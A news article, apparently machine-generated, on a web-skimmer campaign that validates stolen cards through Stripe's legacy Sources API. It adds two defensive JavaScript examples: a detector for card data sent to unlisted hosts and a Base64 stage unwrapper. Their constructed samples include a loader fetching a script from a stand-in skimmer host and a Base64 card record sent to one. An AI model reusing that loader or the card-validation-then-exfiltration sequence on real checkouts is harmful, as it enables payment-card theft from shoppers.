

Ethical Hacking News

The Web Skimmer Campaign: A Sophisticated Threat to Payment Card Security


Threat actors are exploiting a legacy Stripe API to validate stolen payment cards, raising concerns about the security of e-commerce platforms. Find out more about the web skimmer campaign and how businesses can protect themselves against such attacks.

  • At least 49 merchants are estimated to have been affected by the web skimmer campaign.
  • The attackers are using a legacy Stripe API to validate stolen payment cards, making it harder to detect.
  • The JavaScript skimmer, served from malicious domains, intercepts and hides the legitimate payment form on order checkout pages.
  • Only valid card data is sent to the attackers, making the operation more efficient.
  • The attackers are likely leveraging vulnerabilities and misconfigurations in WooCommerce, WordPress, and PrestaShop.
  • The skimmer payload appears to be generated by a tool and tailored to each targeted site.



    The cybersecurity landscape has witnessed numerous threats in recent years, but a new campaign that leverages a legacy Stripe API to validate stolen payment cards is raising concern among security experts. The campaign, which was first flagged by security firm Source Defense towards the end of February 2025, has been identified as a web skimmer operation that targets various e-commerce platforms.

    According to researchers from Jscrambler, who detailed the attack in their report, the threat actors behind this campaign are employing sophisticated tactics to intercept and steal sensitive payment information. The JavaScript skimmer, served from malicious domains, intercepts and hides the legitimate payment form on order checkout pages, serves a replica of the legitimate Stripe payment screen, validates the entered card data using the "api.stripe[.]com/v1/sources" API, and then transmits it to a remote server in Base64-encoded format.

    This tactic ensures that only valid card data is sent to the attackers, making the operation more efficient and potentially harder to detect. The skimming script hides the legitimate Stripe iframe and overlays it with a malicious one designed to mimic its appearance, while also cloning the 'Place Order' button, hiding the real one.
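    The validate-then-transmit sequence described above can be looked for in a merchant's own checkout telemetry. The following is an added example, not code from the Jscrambler report: the record shape, the allowlist and the `.example` hosts are assumptions, and it presumes request bodies are visible to the collector.

```javascript
// Added example: find card data leaving a checkout session for a host that
// is not on the merchant's allowlist, and note whether the same session
// called the legacy Sources endpoint first (the campaign's sequence).
// Assumed: records come from your own proxy or page telemetry, in time order.
const ALLOWED_HOSTS = new Set(['shop.example', 'js.stripe.com', 'api.stripe.com']);

function luhnValid(digits) {
  let sum = 0;
  for (let i = 0; i < digits.length; i++) {
    let d = Number(digits[digits.length - 1 - i]);
    if (i % 2 === 1) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
  }
  return sum % 10 === 0;
}

// True when the body is Base64 that decodes to text holding a Luhn-valid PAN.
function carriesCardData(body) {
  if (!/^[A-Za-z0-9+/]+={0,2}$/.test(body)) return false;
  const text = Buffer.from(body, 'base64').toString('utf8');
  return (text.match(/\b\d{13,19}\b/g) || []).some(luhnValid);
}

function flagSessions(records) {
  const sawSources = new Set();
  const alerts = [];
  for (const r of records) {
    const { hostname, pathname } = new URL(r.url);
    if (hostname === 'api.stripe.com' && pathname === '/v1/sources') {
      sawSources.add(r.session);
    } else if (!ALLOWED_HOSTS.has(hostname) && carriesCardData(r.body || '')) {
      alerts.push({ session: r.session, host: hostname,
                    validatedFirst: sawSources.has(r.session) });
    }
  }
  return alerts;
}

// Constructed telemetry; 4242... is Stripe's published test card number.
const card = Buffer.from('{"number":"4242424242424242","exp":"12/30"}').toString('base64');
const SAMPLE_RECORDS = [
  { session: 'a1', url: 'https://api.stripe.com/v1/sources', body: '' },
  { session: 'a1', url: 'https://collect.skimmer.example/i', body: card },
  { session: 'b2', url: 'https://api.stripe.com/v1/sources', body: '' },
  { session: 'b2', url: 'https://metrics.vendor.example/t', body: 'cGFnZXZpZXc=' },
];

console.log(flagSessions(SAMPLE_RECORDS));
```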

    Jscrambler researchers further noted that the threat actors are likely leveraging vulnerabilities and misconfigurations in WooCommerce, WordPress, and PrestaShop to implant the initial-stage script. This loader script decodes and launches a Base64-encoded next stage, which, in turn, contains the URL pointing to the skimmer.
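    When reviewing scripts found on a storefront, the staged loader described above can be triaged statically by unwrapping Base64 string literals and listing the URLs they reveal. This is an added example, not code from the Jscrambler report; the sample loader, the function names and the `skimmer.example` host are constructed, and the recursion goes beyond the single nesting level the report describes.

```javascript
// Added example: triage a storefront script for nested Base64 stages.
// The sample loader and the skimmer.example host are constructed.
const B64_LITERAL = /["'`]([A-Za-z0-9+/]{24,}={0,2})["'`]/g;
const URL_RE = /https?:\/\/[^\s"'`)\\]+/g;

// Decode a candidate literal; return null unless it is canonical Base64
// that yields mostly printable text (filters hashes, keys and images).
function decodeIfText(b64) {
  if (b64.length % 4 !== 0) return null;
  const buf = Buffer.from(b64, 'base64');
  if (buf.toString('base64') !== b64) return null;
  const text = buf.toString('utf8');
  const printable = text.replace(/[^\x09\x0a\x0d\x20-\x7e]/g, '').length;
  return printable / text.length >= 0.95 ? text : null;
}

// Walk the script, decoding each Base64 literal and recursing into the
// result so that a stage hidden inside another stage is still reported.
function unwrapStages(source, maxDepth = 4) {
  const findings = [];
  const walk = (text, depth) => {
    for (const m of text.matchAll(B64_LITERAL)) {
      const decoded = decodeIfText(m[1]);
      if (decoded === null) continue;
      findings.push({
        depth,
        urls: decoded.match(URL_RE) || [],
        usesSourcesApi: decoded.includes('api.stripe.com/v1/sources'),
        preview: decoded.slice(0, 60),
      });
      if (depth < maxDepth) walk(decoded, depth + 1);
    }
  };
  walk(source, 1);
  return findings;
}

// Constructed sample: a loader holding a Base64 next stage that names a URL.
// It is only ever treated as text here and is never executed.
const stage2 = 'var s=document.createElement("script");' +
  's.src="https://cdn.skimmer.example/c.js";document.head.appendChild(s);';
const SAMPLE_LOADER =
  `(function(){var p="${Buffer.from(stage2).toString('base64')}";` +
  '/* loader decodes p and runs it */})();';

console.log(unwrapStages(SAMPLE_LOADER));
```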

    The security company observed some evidence that the final skimmer payload is generated using some sort of tool, because the script appears to be tailored to each targeted site. The researchers also observed the skimming code adding other payment options using cryptocurrencies like Bitcoin, Ether (Ethereum), Tether, and Litecoin.

    "This sophisticated web skimming campaign highlights the evolving tactics attackers use to remain undetected," said Pedro Fortuna, David Alves, and Pedro Marrucho in their report. "And as a bonus, they effectively filter out invalid credit card data, ensuring that only valid credentials are stolen."

    In total, at least 49 merchants are estimated to have been affected by the campaign to date, with fifteen of the compromised sites having taken action to remove the malicious script injections. The activity is assessed to be ongoing since at least August 20, 2024.

    The attack chains employed by the threat actors center on malicious domains as the initial distribution point for the JavaScript skimmer. The researchers further noted that the threat actors behind this operation are likely targeting several payment service providers.

    Jscrambler's findings highlight the importance of regular security audits and the need for businesses to stay vigilant against evolving threats. Legacy APIs such as Stripe's "api.stripe[.]com/v1/sources" can be abused by threat actors, here to validate stolen cards, and it is crucial for businesses to keep their systems up to date and ensure that all necessary security patches are applied.

    As the world of cybersecurity continues to evolve, it is essential for businesses to stay informed about emerging threats like this web skimmer campaign. By understanding the tactics employed by threat actors, businesses can take proactive measures to protect themselves against such attacks.

    In conclusion, the web skimmer campaign that leverages a legacy Stripe API to validate stolen payment cards is a sophisticated threat that highlights the evolving nature of cybersecurity threats. It is essential for businesses to stay vigilant and proactive in order to prevent falling victim to this type of attack.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/The-Web-Skimmer-Campaign-A-Sophisticated-Threat-to-Payment-Card-Security-ehn.shtml

  • https://thehackernews.com/2025/04/legacy-stripe-api-exploited-to-validate.html


  • Published: Thu Apr 3 00:56:12 2025 by llama3.2 3B Q4_K_M












